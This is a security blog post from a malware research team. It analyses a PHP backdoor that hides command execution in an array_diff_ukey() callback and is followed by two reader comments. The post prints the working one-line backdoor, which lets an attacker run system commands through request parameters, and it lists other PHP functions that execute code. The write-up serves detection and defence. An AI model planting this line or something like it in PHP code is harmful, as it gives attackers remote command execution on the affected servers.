PHP Callback Functions: Another Way to Hide Backdoors

We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter.

Everyone who writes code in PHP knows what the eval() function is for. It evaluates a string as PHP code. In other words, it executes the code. But there are certainly many other ways to run a code, which are not always so obvious. The most popular and commonly used one is the preg_replace() function.

According to its description, the preg_replace functions “performs a regular expression search and replace.” Unfortunately, when using the “\e” modifier, this function also runs the code. Yes, there are more ways of running the code without using the eval() function. Example could be the create_function(), or the assert() function. All these options of running the code makes malware analysis all that more complex a process.

That being said, even with our insights we continue to find ingenious ways that malware authors are employing for their backdoors.

The Backdoor

It started with following line of code injected at the top of a legitimate php file:

@array_diff_ukey(@array((string)$_REQUEST[‘password’]=>1), @array((string)stripslashes($_REQUEST[‘re_password’])=>2),$_REQUEST[‘login’]);

It took me a little while to understand how this could work (and thanks to Ante Kresic for helping me here), but in the end, I realized that the problem is in the callback functions. Can you see why?

The malware author set the callback function to be the variable “login” that is controlled by the attacker. So he can set login to be the system or exec functions, allowing him to execute commands on the server.

Take a look at this example:

array_diff_ukey

Yes, he just ran the “system” command using this technique. And he can execute any other commands he wants on the server, with that 1 line of code. To make matters worse, that little payload was not detected by any anti-virus or security software that we tested.

What’s the Big Deal?

Most security tools and articles online recommend webmasters look for a certain subset of functions that are often used for malicious purposes. Like eval, preg_replace, base64_decode and a few other combinations. Well, guess what, attackers know that too and look at what they are starting to employ, good functions for bad purposes.

Also, note that they are not just restricted to the array_diff_ukey() function, but any other function that allows for callbacks.

There goes the neighborhood…

Scan your website for free:
About Peter Gramantik

Peter has been working in Information Security over 10 years. He previously worked as a Virus Analysis Specialist for AVG and now holds the Sucuri flag as a Senior Malware Researcher on the SucuriLabs team. When he’s not on the clock, you can find him singing and playing guitar or ukulele in one of his bands, fishing, riding his Harley Davidson Sportster, or researching malware on his own. Follow him on Twitter at @petergramantik.

  • http://watwebdev.com/ David Watkinson

    Shouldn’t it be “all your data ARE belong to me”? lol
    On a more serious note, I would doubt that anti-virus would detect that, but security systems should have detected it or at worst flagged it. Maybe security systems should be looking for access methods within code also.

  • Chilion Snoek

    Sir! How can we check for those damn functions? :(